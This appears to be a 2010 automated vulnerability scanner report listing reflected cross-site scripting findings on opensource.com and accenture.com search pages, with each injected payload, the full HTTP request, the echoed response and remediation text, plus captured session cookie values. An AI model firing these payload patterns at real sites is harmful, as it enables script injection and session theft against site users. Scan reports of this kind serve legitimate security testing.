HTTP/1.1 404 Not Found Date: Sun, 21 Nov 2010 18:09:24 GMT Server: Apache Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=dmbh5vkijghseefsmfk4jgg127; expires=Tue, 14-Dec-2010 21:42:44 GMT; path=/; domain=.opensource.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 21 Nov 2010 18:09:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> <met ...[SNIP]... !-- s.pageName="opensource|blocks404"; s.server=""; s.channel="opensource"; s.pageType=""; s.prop1=""; s.campaign=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar23="http://opensource.com/education/10/11cada1"-alert(1)-"ddab8f1f4c6/three-unspoken-blockers-preventing-open-source-participation"; s.events=""; s.products=""; s.state=""; s.zip=""; s.purchaseID=""; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 118ea"-alert(1)-"e6e7e121cd3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/10/11/three-unspoken-blockers-preventing-open-source-participation118ea"-alert(1)-"e6e7e121cd3 HTTP/1.1 Host: opensource.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 21 Nov 2010 18:09:32 GMT Server: Apache Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=mmrp8cuki6bgac3rvbrkn1bkd2; expires=Tue, 14-Dec-2010 21:42:52 GMT; path=/; domain=.opensource.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 21 Nov 2010 18:09:32 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> <met ...[SNIP]... ="opensource"; s.pageType=""; s.prop1=""; s.campaign=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar23="http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation118ea"-alert(1)-"e6e7e121cd3"; s.events=""; s.products=""; s.state=""; s.zip=""; s.purchaseID=""; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ //--> ...[SNIP]...
1.127. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f7ca"-alert(1)-"b0c201e8db0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/10/11/three-unspoken-blockers-preventing-open-source-participation?9f7ca"-alert(1)-"b0c201e8db0=1 HTTP/1.1 Host: opensource.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 18:08:57 GMT Server: Apache Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=4m9kr84ic388b0m1la5a3sabd6; expires=Tue, 14-Dec-2010 21:42:17 GMT; path=/; domain=.opensource.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 21 Nov 2010 18:08:57 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 73176
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> <met ...[SNIP]... "opensource"; s.pageType=""; s.prop1=""; s.campaign=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar23="http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation?9f7ca"-alert(1)-"b0c201e8db0=1"; s.events=""; s.products=""; s.state=""; s.zip=""; s.purchaseID=""; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ //--> ...[SNIP]...
The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11cca"><script>alert(1)</script>fc0af4dfab4 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture11cca"><script>alert(1)</script>fc0af4dfab4&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:37 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:37 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67197
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... n-US&banner=3EFEDDE7-C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture11cca"><script>alert(1)</script>fc0af4dfab4&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchb ...[SNIP]...
The value of the filter request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146f3"><script>alert(1)</script>2ce8741c39d was submitted in the filter parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1146f3"><script>alert(1)</script>2ce8741c39d&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:32 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67197
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... er=3EFEDDE7-C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1146f3"><script>alert(1)</script>2ce8741c39d&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the getfields request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 211ce"><script>alert(1)</script>d579d659514 was submitted in the getfields parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*211ce"><script>alert(1)</script>d579d659514&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:33 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67196
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*211ce"><script>alert(1)</script>d579d659514&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the ie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5302b"><script>alert(1)</script>4aa0ca64ae9 was submitted in the ie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf85302b"><script>alert(1)</script>4aa0ca64ae9&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:35 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67196
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf85302b"><script>alert(1)</script>4aa0ca64ae9&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a4d"><script>alert(1)</script>ca532dd932b was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=41a4d"><script>alert(1)</script>ca532dd932b&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:38 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:37 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67197
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... ooter=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=41a4d"><script>alert(1)</script>ca532dd932b&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the oe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adbc3"><script>alert(1)</script>6f380d9deb9 was submitted in the oe parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8adbc3"><script>alert(1)</script>6f380d9deb9&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:39 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:38 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67198
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... 21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8adbc3"><script>alert(1)</script>6f380d9deb9&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the output request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b150"><script>alert(1)</script>a28362fa3c1 was submitted in the output parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd8b150"><script>alert(1)</script>a28362fa3c1&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:36 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:35 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67198
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... =66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd8b150"><script>alert(1)</script>a28362fa3c1&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the search_in request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a86ff"><script>alert(1)</script>74b31afde1a was submitted in the search_in parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=maina86ff"><script>alert(1)</script>74b31afde1a&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:44 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67198
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... 43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=maina86ff"><script>alert(1)</script>74b31afde1a&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the site request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 522c2"><script>alert(1)</script>af5239f4278 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations522c2"><script>alert(1)</script>af5239f4278&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:44 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:43 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67195
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... 03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations522c2"><script>alert(1)</script>af5239f4278&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the windowTitle request parameter is copied into the HTML document as plain text between tags. The payload 931a7<x%20style%3dx%3aexpression(alert(1))>96a5af8d84d44cce5 was submitted in the windowTitle parameter. This input was echoed as 931a7<x style=x:expression(alert(1))>96a5af8d84d44cce5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
